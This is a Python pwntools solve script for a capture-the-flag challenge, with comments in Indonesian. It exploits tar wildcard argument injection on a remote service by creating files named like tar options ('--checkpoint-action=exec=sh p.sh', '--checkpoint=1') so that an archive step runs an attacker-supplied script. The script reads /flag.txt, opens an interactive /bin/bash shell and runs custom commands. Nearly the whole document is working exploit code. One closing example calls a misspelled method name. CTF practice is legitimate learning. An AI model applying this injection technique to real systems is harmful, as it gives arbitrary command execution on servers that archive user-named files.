mr_bin_cw2k22.py

from pwn import *

"""
@author: reky_suka_kucing_floppa
"""


class MrBin:
    def __init__(self, host, port, debug=False):
        self.io = remote(host, port)
        if debug:
            context.log_level = 'debug'

    def create_file(self, file, content=""):
        if content == "":
            self.io.info(f"Creating file... {file}")
        else:
            self.io.info(f"Creating file... {file} with content: ({content})")
        self.io.sendlineafter(b'>>> Masukkan opsi: ', b'1')
        self.io.sendlineafter(b'ygy: \x1b[0m', bytes(file, 'utf-8'))
        index = 0
        for line in content.split('\n'):
            if index == 0:
                self.io.sendlineafter(b'\x1b[0m\n', bytes(line, 'utf-8'))
            else:
                self.io.sendline(bytes(line, 'utf-8'))
            index += 1
        self.io.sendline(b'WES')

    def send_payloads(self, command: str):
        payloads = [
            "--checkpoint-action=exec=sh p.sh",
            command,
            "--checkpoint=1"
        ]

        for file in payloads:
            if file == payloads[1]:
                self.create_file("p.sh", file)
            else:
                self.create_file(file)

        return self

    def execute(self):
        self.io.sendlineafter(b'>>> Masukkan opsi: ', b'5')

    def get_flag(self):
        self.send_payloads("cat /flag.txt").execute()
        response = self.io.recvline().decode().strip().replace('\x1b[32m[+] Sudah jadi base64 ya:\x1b[0m', '')
        self.io.success("NCW22{" + response + "}")

    def get_shell(self):
        self.send_payloads("/bin/bash -i").execute()
        self.io.sendlineafter(b'>>> Masukkan opsi: ', b'5')
        self.io.interactive()


MrBin("103.167.136.123", 2121).get_flag()

Jika ingin berinteraksi melalui shell maka panggil fungsi get_shell

MrBin("103.167.136.123", 2121).get_shell()

Atau mau custom command? Gini caranya

MrBin("103.167.136.123", 2121).send_payload("uname -a #atau command lainnya").execute()